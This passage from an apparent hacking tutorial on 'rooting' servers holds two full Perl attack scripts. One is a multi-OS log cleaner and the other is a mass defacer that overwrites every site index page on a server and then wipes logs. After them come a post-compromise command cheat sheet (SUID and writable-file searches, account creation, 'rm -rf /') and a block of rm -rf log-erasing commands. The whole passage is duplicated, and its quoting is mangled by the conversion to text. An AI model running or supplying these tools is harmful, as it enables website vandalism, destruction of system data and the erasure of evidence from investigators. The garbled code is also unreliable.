[perl]
#!usr/bin/perl -w #Warnings enabled!
#Log cleaner version Public
#Give Credits Where Needed – Kouros!
#This took time, Hope you fucking use it
#Report bugs to info@Kouros-bl4ckhat.com
#NOTE – YOU MUST BE ROOT!
print qq^
####################################
# Log Cleaner 3.0 PUBLIC #
# Kouros #
# #
# Virangar Security Team #
# http://www.Kouros-bl4ckhat.com #
####################################
^;
while(1) {
print “Enter Which OS: “; #User Input
chomp($os = <STDIN>); #Takes it into memory
if($os eq “help”){
-4-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
print “[+]Enter Your OS! Choose from ‘linux’, ‘aix’, ‘sunos’, ‘irix’n”;
print “[+]Hit enter with OS, Let the script do its workn”;
print “[+]Note: You MUST Be Root!n”;
print “[+]Contact Info[at]Kouros-bl4ckhat [dot] Com”;
print “[+]For Bug finds… Have Fun!n”;
print “[+] – Kouros”;
}
if($os eq “linux”){ #If linux typed, do the following and start brackets
foreach my $logphile(@linux) {
unlink($logphile) || print “[-]Fucked up: “$logphile” : $!n”;
}
} elsif($os eq “sunos”){ #If sunos typed, do the following and start brackets
foreach my $logphile(@sunos) {
unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
}
} elsif($os eq “aix”){ #If aix typed, do the following and start brackets
foreach my $logphile(@aix) {
unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
}
} elsif($os eq “irix”){ #If irix typed, do the following and start bracket
foreach my $logphile(@irix) {
unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
}
} else { print”Umm WTF !?n”; }
#Logs of Irix Systems
{ #Start Irix Bracket
@irix = (“/var/adm/SYSLOG”, “/var/adm/sulog”, “/var/adm/utmp”, “/var/adm/utmpx”,
“/var/adm/wtmp”, “/var/adm/wtmpx”, “/var/adm/lastlog/”,
“/usr/spool/lp/log”, “/var/adm/lp/lp-errs”, “/usr/lib/cron/log”,
“/var/adm/loginlog”, “/var/adm/pacct”, “/var/adm/dtmp”,
“/var/adm/acct/sum/loginlog”, “var/adm/X0msgs”, “/var/adm/crash/vmcore”,
“/var/adm/crash/unix”) #End Array
} #End Irix Bracket
#Log sof Aix Systems
{ #Start Aix Bracket
@aix = (“/var/adm/pacct”, “/var/adm/wtmp”, “/var/adm/dtmp”, “/var/adm/qacct”,
“/var/adm/sulog”, “/var/adm/ras/errlog”, “/var/adm/ras/bootlog”,
“/var/adm/cron/log”, “/etc/utmp”, “/etc/security/lastlog”,
“/etc/security/failedlogin”, “usr/spool/mqueue/syslog”) #End Array
} #End Aix Bracket
#Logs of SunOS Systems
{ #Start SunOS Bracket
@sunos = (“/var/adm/messages”, “/var/adm/aculogs”, “/var/adm/aculog”,
“/var/adm/sulog”, “/var/adm/vold.log”, “/var/adm/wtmp”,
“/var/adm/wtmpx”, “/var/adm/utmp”, “/var/adm/utmpx”,
“/var/adm/log/asppp.log”, “/var/log/syslog”,
“/var/log/POPlog”, “/var/log/authlog”, “/var/adm/pacct”,
“/var/lp/logs/lpsched”, “/var/lp/logs/requests”,
“/var/cron/logs”, “/var/saf/_log”, “/var/saf/port/log”) #End Array
} #End Sunos bracket
#Logs of Linux Systems
-5-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{ #Start Linux Bracket
@linux = (“/var/log/lastlog”, “/var/log/telnetd”, “/var/run/utmp”,
“/var/log/secure”,”/root/.ksh_history”, “/root/.bash_history”,
“/root/.bash_logut”, “/var/log/wtmp”, “/etc/wtmp”,
“/var/run/utmp”, “/etc/utmp”, “/var/log”, “/var/adm”,
“/var/apache/log”, “/var/apache/logs”, “/usr/local/apache/logs”,
“/usr/local/apache/logs”, “/var/log/acct”, “/var/log/xferlog”,
“/var/log/messages/”, “/var/log/proftpd/xferlog.legacy”,
“/var/log/proftpd.xferlog”, “/var/log/proftpd.access_log”,
“/var/log/httpd/error_log”, “/var/log/httpsd/ssl_log”,
“/var/log/httpsd/ssl.access_log”, “/etc/mail/access”,
“/var/log/qmail”, “/var/log/smtpd”, “/var/log/samba”,
“/var/log/samba.log.%m”, “/var/lock/samba”, “/root/.Xauthority”,
“/var/log/poplog”, “/var/log/news.all”, “/var/log/spooler”,
“/var/log/news”, “/var/log/news/news”, “/var/log/news/news.all”,
“/var/log/news/news.crit”, “/var/log/news/news.err”,
“/var/log/news/news.notice”,
“/var/log/news/suck.err”, “/var/log/news/suck.notice”,
“/var/spool/tmp”, “/var/spool/errors”, “/var/spool/logs”, “/var/spool/locks”,
“/usr/local/www/logs/thttpd_log”, “/var/log/thttpd_log”,
“/var/log/ncftpd/misclog.txt”, “/var/log/nctfpd.errs”,
“/var/log/auth”) #End array
} #End linux bracket
} #Ends Loop
[/perl]
##################################################################################
=> Mass deface- I’ve a perl to mass deface sites on the server. execute it as the same way
as above.
[perl]
# MSRml V 0.1 #
# #
# MOROCCO.SECURITY.RULZ mass defacer and log eraser #
# #
# coded by PRI[ll #
# #
# !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! #
# #
# 05/07/2005 #
# #
-6-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
# usage : perl MSRml.pl <path to index> #
# #
# example : perl MSRml.pl /tmp/index.html #
# #
# the_r00t3r@hotmail.com #
#!/usr/bin/perl
use strict;
my $index = $ARGV[0];
if ($ARGV[0])
{
if( -e $index )
{
system “echo -e “33[01;34mStarted MSRml V0.1 by PRI[ll Ok !!33[01;37m"n";
system "echo -e "33[01;37mDefacing all homepages ..."n";
system "find / -name "index*" -exec cp $index {} ;";
system "find / -name "main*" -exec cp $index {} ;";
system "find / -name "home*" -exec cp $index {} ;";
system "find / -name "default*" -exec cp $index {} ;";
system "echo -e "33[01;37m[+] done ! all sites in this box are defaced !”n”;
system “echo -e “33[01;37m----------------------------------------------------------"n";
system "echo -e "33[01;37mCleaning up logs ..."n";
system "echo -e "33[01;34m---------erasing default log files (too fast
=))---------33[01;37m"n";
if( -e "/var/log/lastlog" )
{
system 'rm -rf /var/log/lastlog';
system "echo -e "33[01;37m [*]/var/log/lastlog -erased Ok”n”;
}
-7-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
else
{
system “echo -e “33[01;31m[*]/var/log/lastlog – No such file or directory33[01;37m"n";
}
if( -e "/var/log/wtmp" )
{
system 'rm -rf /var/log/wtmp';
system "echo -e "33[01;37m [*]/var/log/wtmp -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/log/wtmp – No such file or directory33[01;37m"n";
}
if( -e "/etc/wtmp" )
{
system 'rm -rf /etc/wtmp';
system "echo -e "33[01;37m [*]/etc/wtmp -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/etc/wtmp – No such file or directory33[01;37m"n";
}
if( -e "/var/run/utmp" )
{
system 'rm -rf /var/run/utmp';
system "echo -e "33[01;37m [*]/var/run/utmp -erased Ok”n”;
}
else
-8-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{
system “echo -e “33[01;31m[*]/var/run/utmp – No such file or directory33[01;37m"n";
}
if( -e "/etc/utmp" )
{
system 'rm -rf /etc/utmp';
system "echo -e "33[01;37m [*]/etc/utmp -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/etc/utmp – No such file or directory33[01;37m"n";
}
if( -e "/var/log" )
{
system 'rm -rf /var/log';
system "echo -e "33[01;37m [*]/var/log -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/log – No such file or directory33[01;37m"n";
}
if( -e "/var/logs" )
{
system 'rm -rf /var/logs';
system "echo -e "33[01;37m [*]/var/logs -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/logs – No such file or directory33[01;37m"n";
-9-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
}
if( -e "/var/adm" )
{
system 'rm -rf /var/adm';
system "echo -e "33[01;37m [*]/var/adm -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/adm – No such file or directory33[01;37m"n";
}
if( -e "/var/apache/log" )
{
system 'rm -rf /var/apache/log';
system "echo -e "33[01;37m [*]/var/apache/log -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/apache/log – No such file or directory33[01;37m"n";
}
if( -e "/var/apache/logs" )
{
system 'rm -rf /var/apache/logs';
system "echo -e "33[01;37m [*]/var/apache/logs -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/apache/logs – No such file or directory33[01;37m"n";
}
-10-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
if( -e "/usr/local/apache/log" )
{
system 'rm -rf /usr/local/apache/log';
system "echo -e "33[01;37m [*]/usr/local/apache/log -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/usr/local/apache/log – No such file or
directory33[01;37m"n";
}
if( -e "/usr/local/apache/logs" )
{
system 'rm -rf /usr/local/apache/logs';
system "echo -e "33[01;37m [*]/usr/local/apache/logs -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/usr/local/apache/logs – No such file or
directory33[01;37m"n";
}
if( -e "/root/.bash_history" )
{
system 'rm -rf /root/.bash_history';
system "echo -e "33[01;37m [*]/root/.bash_history -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/root/.bash_history – No such file or directory33[01;37m"n";
}
if( -e "/root/.ksh_history" )
-11-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{
system 'rm -rf /root/.ksh_history';
system "echo -e "33[01;37m [*]/root/.ksh_history -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/root/.ksh_history – No such file or directory33[01;37m"n";
}
system "echo -e "33[01;37m[+] —–done all default log and bash_history files erased !!”n”;
system “echo -e “33[01;34m---------Now Erasing the rest of the machine log files (can be
long :S)---------33[01;37m"n";
system 'find / -name *.bash_history -exec rm -rf {} ;';
system "echo -e "33[01;37m[*] all *.bash_history files -erased Ok!”n”;
system ‘find / -name *.bash_logout -exec rm -rf {} ;’;
system “echo -e “33[01;37m[*] all *.bash_logout files -erased Ok!”n”;
system ‘find / -name “log*” -exec rm -rf {} ;’;
system “echo -e “33[01;37m[*] all log* files -erased Ok!”n”;
system ‘find / -name *.log -exec rm -rf {} ;’;
system “echo -e “33[01;37m[*] all *.log files -erased Ok!”n”;
system “echo -e “33[01;34m-------[+] !done all log files erased![+]——-33[01;37m"n";
system "echo -e "33[01;34m---------------------------------------------------33[01;37m"n";
system "echo -e "33[01;34m-----------------MSRml V 0.1----------------------33[01;37m"n";
}
else
{
system "echo -e "33[01;31m[-] Failed ! the path to u’re index could not be found
!33[01;37m"n";
exit;
}
-12-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
}
else
{
system "echo -e "33[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!"n";
system "echo -e "33[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n";
system "echo -e
"33[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!33[01;37m"n";
system "echo -e "33[01;37musage : perl $0 <path too u're index>"n";
system "echo -e "33[01;37mexample : perl $0 /tmp/index.html"n";
exit;
}
[/code]
##################################################################################
=> Important Commands-
./../mainfile.php – Config file.
ls -la – Lists directory’s.
ifconfig {eth0 etc} – Ipconfig equiv.
ps aux – Show running proccess’s.
gcc in_file -o out_file – Compile c file.
cat /etc/passwd – List’s accounts.
sudo – Superuser Do run a command as root provided you have perms
in /etc/sudoers.
id – Tells you what user your logged in as.
which wget curl w3m lynx – Check’s to see what downloaders are
present.
uname -r – Shows all release info (or) cat /etc/release.
uname -a – Shows all kernal info (or) cat /etc/issue
last -30 – Last logged 30 ip’s can change to desired number.
useradd – Create new user account.
usermod – Modify user account.
w – See who is currently logged on.
-13-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
locate password.txt – Locates password.txt in current dur can use *.
rm -rf / – Please be carefull with this command, i cannot stress this
enough.
arp -a – Lists other machines are on the same subnet.
lsattr -va – ls file attributes on linux second extended file system
find / -type f -perm -04000 -ls – Finds suid files.
find . -type f -perm -04000 -ls – Finds suid files in current dir.
find / -type f -perm -02000 -ls – Finds all sgid files.
find / -perm -2 -ls – Finds all writable files and folders.
find . -perm -2 -ls – Finds all writable files and folders in current dir.
find / -type f -name .bash_history – Finds bash history.
netstat -an | grep -i listen – shows open ports.
cut -d: -f1,2,3 /etc/passwd | grep :: – From memory creates a user
with no pass.
find /etc/ -type f -perm -o+w 2> /dev/null – Write in /etc/passwd?.
cat /proc/version /proc/cpuinfo – Cpu info.
locate gcc- Finds gcc if installed.
set – Display system variables.
echo $path- Echo current path.
lsmod- Dumps kernal modules.
mount/df- Check mounted file system.
rpm -qa- Check patch level for RedHat 7.0.
dmesg- Check hardware ino.
cat /etc/syslog.conf – Log file.
uptime – Uptime check.
cat /proc/meminfo – Memory check.
find / -type f -perm -4 -print 2> /dev/null- Find readble files.
find / -type f -perm -2 -print 2> /dev/null – Find writable files.
chmod ### $folder – Chmod folder.
-14-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
ls -l -b – Verbosly list directory’s
————-clear-logs—————–
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} ;
find / -name *.bash_logout -exec rm -rf {} ;
find / -name “log*” -exec rm -rf {} ;
find / -name *.log -exec rm -rf {} ;
#!usr/bin/perl -w #Warnings enabled!
#Log cleaner version Public
#Give Credits Where Needed – Kouros!
#This took time, Hope you fucking use it
#Report bugs to info@Kouros-bl4ckhat.com
#NOTE – YOU MUST BE ROOT!
print qq^
####################################
# Log Cleaner 3.0 PUBLIC #
# Kouros #
# #
# Virangar Security Team #
# http://www.Kouros-bl4ckhat.com #
####################################
^;
while(1) {
print “Enter Which OS: “; #User Input
chomp($os = <STDIN>); #Takes it into memory
if($os eq “help”){
-4-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
print “[+]Enter Your OS! Choose from ‘linux’, ‘aix’, ‘sunos’, ‘irix’n”;
print “[+]Hit enter with OS, Let the script do its workn”;
print “[+]Note: You MUST Be Root!n”;
print “[+]Contact Info[at]Kouros-bl4ckhat [dot] Com”;
print “[+]For Bug finds… Have Fun!n”;
print “[+] – Kouros”;
}
if($os eq “linux”){ #If linux typed, do the following and start brackets
foreach my $logphile(@linux) {
unlink($logphile) || print “[-]Fucked up: “$logphile” : $!n”;
}
} elsif($os eq “sunos”){ #If sunos typed, do the following and start brackets
foreach my $logphile(@sunos) {
unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
}
} elsif($os eq “aix”){ #If aix typed, do the following and start brackets
foreach my $logphile(@aix) {
unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
}
} elsif($os eq “irix”){ #If irix typed, do the following and start bracket
foreach my $logphile(@irix) {
unlink($logphile) || print “[-] Fucked up: “$logphile” : $!n”;
}
} else { print”Umm WTF !?n”; }
#Logs of Irix Systems
{ #Start Irix Bracket
@irix = (“/var/adm/SYSLOG”, “/var/adm/sulog”, “/var/adm/utmp”, “/var/adm/utmpx”,
“/var/adm/wtmp”, “/var/adm/wtmpx”, “/var/adm/lastlog/”,
“/usr/spool/lp/log”, “/var/adm/lp/lp-errs”, “/usr/lib/cron/log”,
“/var/adm/loginlog”, “/var/adm/pacct”, “/var/adm/dtmp”,
“/var/adm/acct/sum/loginlog”, “var/adm/X0msgs”, “/var/adm/crash/vmcore”,
“/var/adm/crash/unix”) #End Array
} #End Irix Bracket
#Log sof Aix Systems
{ #Start Aix Bracket
@aix = (“/var/adm/pacct”, “/var/adm/wtmp”, “/var/adm/dtmp”, “/var/adm/qacct”,
“/var/adm/sulog”, “/var/adm/ras/errlog”, “/var/adm/ras/bootlog”,
“/var/adm/cron/log”, “/etc/utmp”, “/etc/security/lastlog”,
“/etc/security/failedlogin”, “usr/spool/mqueue/syslog”) #End Array
} #End Aix Bracket
#Logs of SunOS Systems
{ #Start SunOS Bracket
@sunos = (“/var/adm/messages”, “/var/adm/aculogs”, “/var/adm/aculog”,
“/var/adm/sulog”, “/var/adm/vold.log”, “/var/adm/wtmp”,
“/var/adm/wtmpx”, “/var/adm/utmp”, “/var/adm/utmpx”,
“/var/adm/log/asppp.log”, “/var/log/syslog”,
“/var/log/POPlog”, “/var/log/authlog”, “/var/adm/pacct”,
“/var/lp/logs/lpsched”, “/var/lp/logs/requests”,
“/var/cron/logs”, “/var/saf/_log”, “/var/saf/port/log”) #End Array
} #End Sunos bracket
#Logs of Linux Systems
-5-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{ #Start Linux Bracket
@linux = (“/var/log/lastlog”, “/var/log/telnetd”, “/var/run/utmp”,
“/var/log/secure”,”/root/.ksh_history”, “/root/.bash_history”,
“/root/.bash_logut”, “/var/log/wtmp”, “/etc/wtmp”,
“/var/run/utmp”, “/etc/utmp”, “/var/log”, “/var/adm”,
“/var/apache/log”, “/var/apache/logs”, “/usr/local/apache/logs”,
“/usr/local/apache/logs”, “/var/log/acct”, “/var/log/xferlog”,
“/var/log/messages/”, “/var/log/proftpd/xferlog.legacy”,
“/var/log/proftpd.xferlog”, “/var/log/proftpd.access_log”,
“/var/log/httpd/error_log”, “/var/log/httpsd/ssl_log”,
“/var/log/httpsd/ssl.access_log”, “/etc/mail/access”,
“/var/log/qmail”, “/var/log/smtpd”, “/var/log/samba”,
“/var/log/samba.log.%m”, “/var/lock/samba”, “/root/.Xauthority”,
“/var/log/poplog”, “/var/log/news.all”, “/var/log/spooler”,
“/var/log/news”, “/var/log/news/news”, “/var/log/news/news.all”,
“/var/log/news/news.crit”, “/var/log/news/news.err”,
“/var/log/news/news.notice”,
“/var/log/news/suck.err”, “/var/log/news/suck.notice”,
“/var/spool/tmp”, “/var/spool/errors”, “/var/spool/logs”, “/var/spool/locks”,
“/usr/local/www/logs/thttpd_log”, “/var/log/thttpd_log”,
“/var/log/ncftpd/misclog.txt”, “/var/log/nctfpd.errs”,
“/var/log/auth”) #End array
} #End linux bracket
} #Ends Loop
[/perl]
##################################################################################
=> Mass deface- I’ve a perl to mass deface sites on the server. execute it as the same way
as above.
[perl]
# MSRml V 0.1 #
# #
# MOROCCO.SECURITY.RULZ mass defacer and log eraser #
# #
# coded by PRI[ll #
# #
# !!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!!!PRIV8!!!! #
# #
# 05/07/2005 #
# #
-6-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
# usage : perl MSRml.pl <path to index> #
# #
# example : perl MSRml.pl /tmp/index.html #
# #
# the_r00t3r@hotmail.com #
#!/usr/bin/perl
use strict;
my $index = $ARGV[0];
if ($ARGV[0])
{
if( -e $index )
{
system “echo -e “33[01;34mStarted MSRml V0.1 by PRI[ll Ok !!33[01;37m"n";
system "echo -e "33[01;37mDefacing all homepages ..."n";
system "find / -name "index*" -exec cp $index {} ;";
system "find / -name "main*" -exec cp $index {} ;";
system "find / -name "home*" -exec cp $index {} ;";
system "find / -name "default*" -exec cp $index {} ;";
system "echo -e "33[01;37m[+] done ! all sites in this box are defaced !”n”;
system “echo -e “33[01;37m----------------------------------------------------------"n";
system "echo -e "33[01;37mCleaning up logs ..."n";
system "echo -e "33[01;34m---------erasing default log files (too fast
=))---------33[01;37m"n";
if( -e "/var/log/lastlog" )
{
system 'rm -rf /var/log/lastlog';
system "echo -e "33[01;37m [*]/var/log/lastlog -erased Ok”n”;
}
-7-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
else
{
system “echo -e “33[01;31m[*]/var/log/lastlog – No such file or directory33[01;37m"n";
}
if( -e "/var/log/wtmp" )
{
system 'rm -rf /var/log/wtmp';
system "echo -e "33[01;37m [*]/var/log/wtmp -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/log/wtmp – No such file or directory33[01;37m"n";
}
if( -e "/etc/wtmp" )
{
system 'rm -rf /etc/wtmp';
system "echo -e "33[01;37m [*]/etc/wtmp -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/etc/wtmp – No such file or directory33[01;37m"n";
}
if( -e "/var/run/utmp" )
{
system 'rm -rf /var/run/utmp';
system "echo -e "33[01;37m [*]/var/run/utmp -erased Ok”n”;
}
else
-8-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{
system “echo -e “33[01;31m[*]/var/run/utmp – No such file or directory33[01;37m"n";
}
if( -e "/etc/utmp" )
{
system 'rm -rf /etc/utmp';
system "echo -e "33[01;37m [*]/etc/utmp -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/etc/utmp – No such file or directory33[01;37m"n";
}
if( -e "/var/log" )
{
system 'rm -rf /var/log';
system "echo -e "33[01;37m [*]/var/log -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/log – No such file or directory33[01;37m"n";
}
if( -e "/var/logs" )
{
system 'rm -rf /var/logs';
system "echo -e "33[01;37m [*]/var/logs -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/logs – No such file or directory33[01;37m"n";
-9-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
}
if( -e "/var/adm" )
{
system 'rm -rf /var/adm';
system "echo -e "33[01;37m [*]/var/adm -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/adm – No such file or directory33[01;37m"n";
}
if( -e "/var/apache/log" )
{
system 'rm -rf /var/apache/log';
system "echo -e "33[01;37m [*]/var/apache/log -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/apache/log – No such file or directory33[01;37m"n";
}
if( -e "/var/apache/logs" )
{
system 'rm -rf /var/apache/logs';
system "echo -e "33[01;37m [*]/var/apache/logs -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/var/apache/logs – No such file or directory33[01;37m"n";
}
-10-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
if( -e "/usr/local/apache/log" )
{
system 'rm -rf /usr/local/apache/log';
system "echo -e "33[01;37m [*]/usr/local/apache/log -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/usr/local/apache/log – No such file or
directory33[01;37m"n";
}
if( -e "/usr/local/apache/logs" )
{
system 'rm -rf /usr/local/apache/logs';
system "echo -e "33[01;37m [*]/usr/local/apache/logs -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/usr/local/apache/logs – No such file or
directory33[01;37m"n";
}
if( -e "/root/.bash_history" )
{
system 'rm -rf /root/.bash_history';
system "echo -e "33[01;37m [*]/root/.bash_history -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/root/.bash_history – No such file or directory33[01;37m"n";
}
if( -e "/root/.ksh_history" )
-11-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
{
system 'rm -rf /root/.ksh_history';
system "echo -e "33[01;37m [*]/root/.ksh_history -erased Ok”n”;
}
else
{
system “echo -e “33[01;31m[*]/root/.ksh_history – No such file or directory33[01;37m"n";
}
system "echo -e "33[01;37m[+] —–done all default log and bash_history files erased !!”n”;
system “echo -e “33[01;34m---------Now Erasing the rest of the machine log files (can be
long :S)---------33[01;37m"n";
system 'find / -name *.bash_history -exec rm -rf {} ;';
system "echo -e "33[01;37m[*] all *.bash_history files -erased Ok!”n”;
system ‘find / -name *.bash_logout -exec rm -rf {} ;’;
system “echo -e “33[01;37m[*] all *.bash_logout files -erased Ok!”n”;
system ‘find / -name “log*” -exec rm -rf {} ;’;
system “echo -e “33[01;37m[*] all log* files -erased Ok!”n”;
system ‘find / -name *.log -exec rm -rf {} ;’;
system “echo -e “33[01;37m[*] all *.log files -erased Ok!”n”;
system “echo -e “33[01;34m-------[+] !done all log files erased![+]——-33[01;37m"n";
system "echo -e "33[01;34m---------------------------------------------------33[01;37m"n";
system "echo -e "33[01;34m-----------------MSRml V 0.1----------------------33[01;37m"n";
}
else
{
system "echo -e "33[01;31m[-] Failed ! the path to u’re index could not be found
!33[01;37m"n";
exit;
}
-12-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
}
else
{
system "echo -e "33[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!"n";
system "echo -e "33[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!"n";
system "echo -e
"33[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!33[01;37m"n";
system "echo -e "33[01;37musage : perl $0 <path too u're index>"n";
system "echo -e "33[01;37mexample : perl $0 /tmp/index.html"n";
exit;
}
[/code]
##################################################################################
=> Important Commands-
./../mainfile.php – Config file.
ls -la – Lists directory’s.
ifconfig {eth0 etc} – Ipconfig equiv.
ps aux – Show running proccess’s.
gcc in_file -o out_file – Compile c file.
cat /etc/passwd – List’s accounts.
sudo – Superuser Do run a command as root provided you have perms
in /etc/sudoers.
id – Tells you what user your logged in as.
which wget curl w3m lynx – Check’s to see what downloaders are
present.
uname -r – Shows all release info (or) cat /etc/release.
uname -a – Shows all kernal info (or) cat /etc/issue
last -30 – Last logged 30 ip’s can change to desired number.
useradd – Create new user account.
usermod – Modify user account.
w – See who is currently logged on.
-13-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
locate password.txt – Locates password.txt in current dur can use *.
rm -rf / – Please be carefull with this command, i cannot stress this
enough.
arp -a – Lists other machines are on the same subnet.
lsattr -va – ls file attributes on linux second extended file system
find / -type f -perm -04000 -ls – Finds suid files.
find . -type f -perm -04000 -ls – Finds suid files in current dir.
find / -type f -perm -02000 -ls – Finds all sgid files.
find / -perm -2 -ls – Finds all writable files and folders.
find . -perm -2 -ls – Finds all writable files and folders in current dir.
find / -type f -name .bash_history – Finds bash history.
netstat -an | grep -i listen – shows open ports.
cut -d: -f1,2,3 /etc/passwd | grep :: – From memory creates a user
with no pass.
find /etc/ -type f -perm -o+w 2> /dev/null – Write in /etc/passwd?.
cat /proc/version /proc/cpuinfo – Cpu info.
locate gcc- Finds gcc if installed.
set – Display system variables.
echo $path- Echo current path.
lsmod- Dumps kernal modules.
mount/df- Check mounted file system.
rpm -qa- Check patch level for RedHat 7.0.
dmesg- Check hardware ino.
cat /etc/syslog.conf – Log file.
uptime – Uptime check.
cat /proc/meminfo – Memory check.
find / -type f -perm -4 -print 2> /dev/null- Find readble files.
find / -type f -perm -2 -print 2> /dev/null – Find writable files.
chmod ### $folder – Chmod folder.
-14-
C:UsersAshDesktopR00ting By Cyb3R ShubhaM.txt 25 January 2011 20:54
ls -l -b – Verbosly list directory’s
————-clear-logs—————–
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
history -c
find / -name *.bash_history -exec rm -rf {} ;
find / -name *.bash_logout -exec rm -rf {} ;
find / -name “log*” -exec rm -rf {} ;
find / -name *.log -exec rm -rf {} ;
